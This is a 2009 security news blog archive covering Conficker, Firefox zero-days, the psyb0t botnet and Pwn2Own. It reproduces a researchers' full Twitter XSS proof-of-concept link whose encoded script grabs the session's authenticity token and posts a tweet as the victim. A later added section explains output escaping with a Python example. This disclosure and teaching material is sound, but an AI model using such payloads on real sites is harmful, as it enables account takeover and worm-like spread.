Archive for March, 2009

Conficker Around The World

[ http://www.worldtimezone.com/ ]

It’s now April 01 in New Zealand, and in a few minutes here in Australia, followed by Asia, Africa, Europe and America. This high-profile internet worm will then trigger its payload: generating 50,000 domain names, of which it picks only 500 at random to call home.

Everyone is watching for what comes next.

Another Firefox Zero Day

Just a couple of days ago, a Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day, and yesterday another one: Firefox 3.0.x (XML Parser) Memory Corruption / DoS PoC.

These vulnerabilities do NOT affect Mac OS X.

Linux Worm “Psyb0t”

More information has surfaced about the botnet “psyb0t,” the first known to be capable of directly infecting home routers and cable/DSL modems.

It was first observed infecting a Netcomm NB5 modem/router in Australia.

Further read @ http://blogs.zdnet.com/BTL/?p=15197

Further read @ http://www.dronebl.org/blog/8

Analysis @ http://www.adam.com.au/bogaurd/PSYB0T.pdf

Phishing OptusMail

Phishers are targeting Optus, one of the biggest telecoms in Australia.

CanSecWest PWN2OWN Hacks Mac in 10 seconds

Last year’s CanSecWest PWN2OWN successfully hacked Mac OS X in 2 minutes, but this year it’s a whopping 10 seconds!

In an interview he described it: “I gave them the link, they clicked on it, and that was it,” said Miller. “I did a few things to show that I had full control of the Mac.”

He walked off with a $5,000 cash prize and the MacBook he hacked.

Apparently, just last year the attack succeeded by targeting Safari plus an internet connection.

This gives us a clear picture of which attack vector can easily get onto users’ computers.

Not surprising that we are now bombarded with Internet threats!

Conficker.C Analysis

Good job from SRI for making this paper publicly available!

>> http://mtc.sri.com/Conficker/addendumC/

Twitter Viral XSS

@ Researchers Make Wormy Twitter Attack

>> http://www.pcworld.com/businesscenter/article/161631/researchers_make_wormy_twitter_attack.html

@ http://www.securescience.net/twoubledtwitter.html

—————————————————————————————————-

<html>
Link for Twitter Viral XSS Proof of Concept:
<p><a href="http://twitter.com/help/request_source?device_source%5Bname%5D=%3Cscript%3Eif%28confirm%28%22Combining+Twitter+and+it%27s+viral+market+affect%2C+an+attacker+could+do+much+more+than+our+simple+proof+of+concept%2E+They+could+use+this+to+infect+massive+amounts+of+twitter+users+within+hours+using+remote+exploit+code%2C+as+well+as+steal+their+twitter+account+information%2C+all+without+the+victims+knowledge%2E%5Cn%5CnIf+you+proceed%2C+a+tweet+will+be+posted+automatically+AS+YOURSELF%2E+The+contents+of+this+tweet+is+innocuous+but+demonstrates+the+viral+capabilities%2E+By+clicking+OK+you+will+demonstrate+this+flaw%2E+Clicking+cancel+will+leave+this+demonstration+without+any+effects%2E%22%29%29%7Ba%3Dfunction%28p%2Ct%2Cn%29%7Bvar+o%3Ddocument%2EcreateElement%28t%29%3Bif%28n%29%7Bo%2Etype%3D%22hidden%22%3Bo%2Ename%3Dn%7D%3Bp%2EappendChild%28o%29%3Breturn+o%3B%7D%3Bf%3Da%28document%2Ebody%2C%22form%22%29%3Bf%2Eaction%3D%22%2Fstatus%2Fupdate%22%3Bf%2Emethod%3D%22POST%22%3Ba%28f%2C%22input%22%2C%22authenticity%5Ftoken%22%29%2Evalue%3Dtwttr%2Eform%5Fauthenticity%5Ftoken%3Ba%28f%2C%22input%22%2C%22status%22%29%2Evalue%3D%22%40XSSExploits+I+just+got+owned%21%22%3Bf%2Esubmit%28%29%3B%7Delse%7Blocation%2Ehref%3D%22http%3A%2F%2Fwww%2Esecurescience%2Ecom%2F%22%7D%3C%2Fscript%3E">Link</a></p>
<p>Link is benign, accompanied with a choice of whether you want to be exploited or not, and an explanation of the process. If you accept, your account will have posted a reply to XSSExploits with “I just got owned!”.</p>
<p>For more on how severe XSS can get please read <a href="http://www.securescience.com/FILES/securescience/10237/335_PH_EXP_05.pdf">Chapter 5</a> of Phishing Exposed.</p>
<p>Research conducted by Lance James and Eric Wastl</p>
</html>

—————————————————————————————————-

Take note that this is NOT platform dependent. I hope attackers will not take advantage of this code!
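The PoC link above works because the request_source page reflects the percent-encoded device_source[name] parameter into its HTML without output encoding; once the injected script runs on the twitter.com origin it can read twttr.form_authenticity_token from the DOM, so the CSRF token does not help and the fix has to be at the output point. The following is an added example, not code from the original post or from Twitter or Secure Science: it decodes a query string the way a web framework would, renders it first without and then with HTML escaping, and shows that only the escaped version is inert. The hostname, page path and the short payload are constructed stand-ins for the real link.

```python
"""Added example: reflected-parameter XSS, vulnerable vs. hardened rendering.

Not from the original post. The parameter name device_source[name] is taken
from the PoC URL on the page; everything else here is constructed.
"""
from html import escape
from urllib.parse import parse_qs, urlsplit

PARAM = "device_source[name]"

# Constructed sample link: a shortened stand-in for the PoC link above.
# The hostname is a reserved .invalid name, so it resolves nowhere.
SAMPLE_LINK = (
    "http://example.invalid/help/request_source?"
    "device_source%5Bname%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
)


def reflected_value(link: str) -> str:
    """Percent-decode the query string and return the reflected parameter,
    which is what the web framework hands to the template (keys are decoded
    too, so %5Bname%5D becomes [name])."""
    query = parse_qs(urlsplit(link).query)
    return query.get(PARAM, [""])[0]


def render_unsafe(value: str) -> str:
    """Vulnerable rendering: the decoded parameter lands in the markup
    verbatim, so a <script> element in it becomes live on this origin."""
    return f"<p>Source: {value}</p>"


def render_safe(value: str) -> str:
    """Hardened rendering: HTML-escape at the output point, for the HTML
    text context. quote=True also neutralises quotes, which matters if the
    same value is ever placed inside an attribute."""
    return f"<p>Source: {escape(value, quote=True)}</p>"


def contains_active_markup(rendered: str) -> bool:
    """Regression check for a test suite: a literal <script tag must never
    survive rendering of user-controlled input."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    value = reflected_value(SAMPLE_LINK)
    print("decoded parameter:", value)
    for label, renderer in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = renderer(value)
        print(f"{label:6}: {out}  active markup: {contains_active_markup(out)}")
```

The check in contains_active_markup is deliberately a test-suite assertion, not a filter: the lesson of the PoC is that the reflected value has to be encoded for its output context, not pattern-matched on the way in.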